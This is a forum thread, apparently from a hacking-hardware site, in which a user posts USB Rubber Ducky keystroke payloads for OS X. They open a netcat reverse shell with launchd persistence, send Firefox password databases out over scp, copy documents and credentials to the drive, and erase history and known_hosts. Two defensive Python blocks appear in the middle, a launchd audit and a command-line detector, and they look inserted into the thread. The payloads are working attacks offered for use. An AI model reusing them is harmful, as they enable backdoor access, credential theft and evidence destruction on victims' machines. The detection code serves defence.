Shark3y Posted January 26, 2013

Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very, very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between, and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple).

```
REM title: osx reverse shell - execute in background - minimize terminal - run on startup
DELAY 500
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 600
STRING touch script.sh
ENTER
STRING echo "mkfifo foo" > script.sh
ENTER
STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh
ENTER
STRING chmod +rwx script.sh
ENTER
STRING launchctl submit -l someName -p ~/script.sh
ENTER
STRING ./script.sh&
ENTER
STRING clear
ENTER
GUI m
```

This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note, however, that because of the way the script is written it will connect back on login, and not continuously attempt to connect back. It then runs it in the background, clears the screen and minimizes.

Enjoy, I will be posting more advanced payloads soon!

-Shark3y
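The persistence step above relies on `launchctl submit`, which registers a launchd job without writing a plist to disk. A defender can surface such jobs by comparing the labels reported by `launchctl list` against the labels found in the LaunchAgents/LaunchDaemons plist directories. The following Python audit is an added example, not code from the post or from Hak5; the `launchctl list` output and the plist label set are constructed samples, and treating every `com.apple.` label as trusted is an assumption made for brevity.

```python
import os
import plistlib

# Constructed sample of `launchctl list` output for this demo (the real command
# prints a header line, then one tab-separated PID / last-exit-status / label row per job).
SAMPLE_LAUNCHCTL_LIST = (
    "PID\tStatus\tLabel\n"
    "-\t0\tcom.apple.SafariHistoryServiceAgent\n"
    "412\t0\tcom.apple.cfprefsd.xpc.agent\n"
    "733\t0\tsomeName\n"
    "-\t0\tcom.example.updater\n"
)

# Constructed: labels that a scan of the LaunchAgents/LaunchDaemons directories
# would have recovered from plist files on this imaginary machine.
SAMPLE_PLIST_LABELS = {"com.example.updater"}

# Directories launchd reads plists from (system-wide and per-user).
LAUNCHD_DIRS = [
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    "/System/Library/LaunchAgents",
    "/System/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
]


def parse_launchctl_list(text):
    """Turn `launchctl list` output into dicts with pid (None if not running), status, label."""
    jobs = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 3 or parts[0] == "PID":  # skip the header and malformed rows
            continue
        pid, status, label = parts
        jobs.append({
            "pid": None if pid == "-" else int(pid),
            "status": int(status),
            "label": label,
        })
    return jobs


def collect_plist_labels(dirs=LAUNCHD_DIRS):
    """Read the Label key from every plist in the launchd directories that exist."""
    labels = set()
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            if not name.endswith(".plist"):
                continue
            try:
                with open(os.path.join(d, name), "rb") as fh:
                    labels.add(plistlib.load(fh).get("Label", name[:-len(".plist")]))
            except Exception:
                continue  # unreadable or non-plist file: skip it rather than abort the audit
    return labels


def find_unbacked_jobs(jobs, plist_labels, trusted_prefixes=("com.apple.",)):
    """Jobs whose label has no plist behind it; the trusted-prefix skip is a simplifying assumption."""
    return [
        j for j in jobs
        if not j["label"].startswith(trusted_prefixes) and j["label"] not in plist_labels
    ]


def audit_sample():
    """Run the audit over the constructed sample; returns the suspicious labels."""
    jobs = parse_launchctl_list(SAMPLE_LAUNCHCTL_LIST)
    return [j["label"] for j in find_unbacked_jobs(jobs, SAMPLE_PLIST_LABELS)]


if __name__ == "__main__":
    # On a real Mac, feed in subprocess.run(["launchctl", "list"], capture_output=True, text=True).stdout
    # and the label set from collect_plist_labels() instead of the constructed samples.
    for label in audit_sample():
        print("launchd job without a plist on disk:", label)
```

On the constructed sample the only job flagged is `someName`, the label the post's payload hands to `launchctl submit`; a job that has a pid but no plist anywhere launchd loads from is worth an analyst's look regardless of its name.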
Shark3y Posted January 31, 2013

Here is a fully 'weaponized' Firefox saved-credential harvesting ducky script. I started with Firefox because that's what I use. Other browsers coming soon.

```
REM title: OSX harvest firefox password files > secure transfer > cover tracks
DELAY 1200
GUI SPACE
DELAY 200
STRING terminal
ENTER
DELAY 1400
STRING cd ~/Library/Application\ Support/
ENTER
STRING scp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" user@host:~/Directory_to_save_creds/
ENTER
DELAY 900
STRING yes
ENTER
DELAY 600
STRING sshpassword
ENTER
DELAY 1000
STRING rm ~/.ssh/known_hosts
ENTER
DELAY 100
STRING history -c
ENTER
DELAY 100
GUI q
ENTER
```

I used scp for the file transfer, though you could easily use other methods that may be quicker (no authentication), but this script still executes in about 10 seconds or so. Also, this script removes the obvious evidence such as the known_hosts file, as well as clearing the command history. On a side note, I used the find command because sometimes the files are in the mozilla folder, and because the profile folder has a random prefix; this way we get what we want no matter what ;) You can increase the speed of the command by using direct pathnames, but you lose some functionality. Enjoy.
Shark3y Posted February 10, 2013

Here is my next payload. It requires the twin duck firmware. It also implies the SD card is named "DUCKY". I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the Firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready; then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up. The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done).

```
REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks
DELAY 2000
GUI SPACE
DELAY 300
STRING terminal
ENTER
DELAY 1000
STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;
ENTER
GUI m
```

I'm working on something much more interesting, but I don't want to give too much information until it's done. Just a hint: it's iSight related ;) I hope someone is enjoying these...

-Shark3y
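All three payloads in this thread (the January 26 reverse shell, the January 31 credential transfer and the February 10 document-to-drive copy) are typed into Terminal, so each step shows up as a process command line in endpoint or shell-audit telemetry. The following Python detector is an added, defender-side example and not code from the posts or from Hak5: it runs a small set of command-line rules over a constructed log and scores the distinct techniques seen in a window, so a chain of credential-store access followed by history clearing stands out more than any one command. The rule names, severity weights, alert threshold and the sample command lines are all my own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample of process command lines, in the form an endpoint agent or
# shell-audit log on macOS might record them; these are made up for the demo.
SAMPLE_COMMANDS = [
    "ls -la /Users/alice/Documents",
    "mkfifo foo",
    "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo",
    "launchctl submit -l someName -p /Users/alice/script.sh",
    'scp "./Firefox/Profiles/ab12cd34.default/key3.db" user@host:~/Directory_to_save_creds/',
    "rm /Users/alice/.ssh/known_hosts",
    "history -c",
    "git commit -m 'fix history handling'",
    "cp docs_alice_02-10-13.zip /Volumes/DUCKY/",
    "diskutil eject DUCKY",
]


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    severity: str  # "low", "medium" or "high"


# One rule per step of the payloads above; names and severities are assumptions.
RULES = [
    Rule("fifo_reverse_shell",
         re.compile(r"\b(nc|ncat|netcat)\b.*<\s*\S+\s*\|\s*/bin/(ba)?sh\b"), "high"),
    Rule("named_pipe_created", re.compile(r"\bmkfifo\b"), "low"),
    Rule("launchctl_adhoc_job", re.compile(r"\blaunchctl\s+submit\b"), "medium"),
    Rule("browser_credential_store_access",
         re.compile(r"\b(key3\.db|key4\.db|signons\.sqlite|logins\.json)\b"), "high"),
    Rule("ssh_known_hosts_removed", re.compile(r"\brm\b.*\.ssh/known_hosts"), "medium"),
    Rule("shell_history_cleared", re.compile(r"\bhistory\s+-c\b"), "medium"),
    Rule("copy_to_removable_volume", re.compile(r"\b(cp|mv|rsync)\b.*\s/Volumes/"), "medium"),
]

SEVERITY_WEIGHT = {"low": 1, "medium": 2, "high": 4}
SEVERITY_BY_NAME = {r.name: r.severity for r in RULES}


def match_rules(command):
    """Names of all rules that fire on a single command line."""
    return [r.name for r in RULES if r.pattern.search(command)]


def scan(commands):
    """(index, rule name, command) for every rule hit across a command sequence."""
    return [(i, name, cmd) for i, cmd in enumerate(commands) for name in match_rules(cmd)]


def risk_score(commands, window=20):
    """Sum of severity weights over the *distinct* rules seen in the last `window` commands.

    Each rule counts once, so repeating one noisy command does not inflate the score,
    while a chain of different techniques (persistence, credential access, anti-forensics) does.
    """
    seen = {name for _, name, _ in scan(commands[-window:])}
    return sum(SEVERITY_WEIGHT[SEVERITY_BY_NAME[name]] for name in seen)


def should_alert(commands, threshold=6):
    """Alert when the windowed score reaches the (assumed) threshold."""
    return risk_score(commands) >= threshold


if __name__ == "__main__":
    for index, name, cmd in scan(SAMPLE_COMMANDS):
        print(f"[{SEVERITY_BY_NAME[name]:6}] #{index} {name}: {cmd}")
    print("score:", risk_score(SAMPLE_COMMANDS), "alert:", should_alert(SAMPLE_COMMANDS))
```

On the sample log every one of the seven payload steps trips exactly one rule, the unrelated `ls`, `git commit` and `diskutil` lines trip none, and the distinct-rule score (17 under these weights) is well over the threshold. The weak spot is the `history -c` rule: it only helps if the telemetry source is the process monitor rather than the shell history file the command erases, which is the point of capturing command lines at execution time.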
sober Posted February 20, 2013

I will say I'm enjoying them, as I am picking up a Rubber Ducky and was getting payloads in order; a few less I have (or get) to write :D
brazen Posted February 18, 2014

> Here is my next payload. It requires the twin duck firmware. It also implies the SD card is named "DUCKY". I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the Firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready; then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up. The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done).
>
> ```
> REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks
> DELAY 2000
> GUI SPACE
> DELAY 300
> STRING terminal
> ENTER
> DELAY 1000
> STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;
> ENTER
> GUI m
> ```
>
> I'm working on something much more interesting, but I don't want to give too much information until it's done. Just a hint: it's iSight related ;) I hope someone is enjoying these...
>
> -Shark3y

Shark3y... these are amazing! Do you have anything else? Yours are the only ones that I can find for OS X.
hakhu6 Posted April 27, 2014

I've seen a Chrome harvesting payload on this forum as well, where it goes into browser settings, shows passwords, copies and pastes them to a notepad file and then to the ducky. However, on OS X, when you click 'show passwords' you are required to enter the account password as authentication to proceed. Does ducky get around this, or does it stop it in its cute little webbed tracks?
activezombie Posted September 27, 2014

Shark3y, thank you for the effort, but your script does nothing but copy an empty folder under the user name. So this manages to copy the home folder with nothing inside.